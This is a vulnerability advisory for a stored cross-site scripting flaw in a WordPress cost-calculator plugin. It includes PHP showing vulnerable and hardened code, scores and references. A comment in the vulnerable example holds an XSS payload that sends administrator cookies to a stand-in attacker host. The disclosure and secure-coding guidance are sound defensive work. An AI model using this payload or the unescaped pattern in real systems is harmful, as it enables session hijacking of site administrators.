CVE-2026-2506

medium

Description

The EM Cost Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to the plugin storing attacker-controlled 'customer_name' data and rendering it in the admin customer list without output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the EMCC Customers page.
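The pattern behind this finding, as an added illustrative example: it is not the EM Cost Calculator plugin's own code (the trac links under References point at the real storing and rendering lines, which this page does not reproduce). Function names, the table name and the use of $_POST['customer_name'] are assumptions; the block assumes a normal WordPress runtime where $wpdb, sanitize_text_field(), wp_unslash(), esc_html() and current_user_can() are available. The first two functions show the vulnerable shape (unauthenticated input stored verbatim, then echoed into the admin page), the last two the hardened shape.

```php
<?php
// Added example, not the plugin's code. Table name, function names and the
// request field are hypothetical; WordPress core APIs are used as documented.

// --- Vulnerable pattern (the shape the advisory describes) ---

// Front-end handler: any visitor can submit the calculator form, so the
// value is attacker-controlled. It is stored exactly as received.
function emcc_example_store_customer_vulnerable() {
    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'emcc_example_customers',          // hypothetical table
        array( 'customer_name' => $_POST['customer_name'] ),
        array( '%s' )
    );
}

// Admin page: each stored name is concatenated straight into the HTML.
function emcc_example_render_customers_vulnerable( array $rows ) {
    echo '<table><tr><th>Name</th></tr>';
    foreach ( $rows as $row ) {
        // No output escaping. A stored name such as
        //   <img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">
        // becomes live markup and runs with the administrator's session
        // the moment they open the customer list.
        echo '<tr><td>' . $row->customer_name . '</td></tr>';
    }
    echo '</table>';
}

// --- Hardened pattern ---

function emcc_example_store_customer_hardened() {
    global $wpdb;
    // Sanitise on input to limit what is persisted (strips tags, control
    // characters and extra whitespace). This is defence in depth only; the
    // fix that matters for XSS is escaping at output time, below.
    $name = isset( $_POST['customer_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['customer_name'] ) )
        : '';
    $wpdb->insert(
        $wpdb->prefix . 'emcc_example_customers',
        array( 'customer_name' => $name ),
        array( '%s' )
    );
}

function emcc_example_render_customers_hardened( array $rows ) {
    // The list is admin-only data; enforce the capability before rendering.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'emcc-example' ) );
    }
    echo '<table><tr><th>Name</th></tr>';
    foreach ( $rows as $row ) {
        // esc_html() encodes < > & " ' for the HTML text context, so stored
        // markup is displayed as literal text instead of being parsed.
        echo '<tr><td>' . esc_html( $row->customer_name ) . '</td></tr>';
    }
    echo '</table>';
}
```

When reviewing a plugin for this class of bug, the quick check is to find every place a stored user-supplied value is echoed in an admin template and confirm it passes through the escaping function for that context (esc_html() for text, esc_attr() for attribute values, esc_url() for links); input sanitisation alone does not close the hole, because the same value can be read back from the database by code paths that never sanitised it.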

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/1eef338a-ccc7-41a2-b87a-0945e39380d2?source=cve

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L701

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L682

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L655

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calc-admin-page.php#L59

Details

Source: Mitre, NVD

Published: 2026-02-26

Updated: 2026-04-15

Risk Information

CVSS v2

Base Score: 6.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

Severity: Medium

CVSS v3

Base Score: 6.1

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Severity: Medium

EPSS

EPSS: 0.0007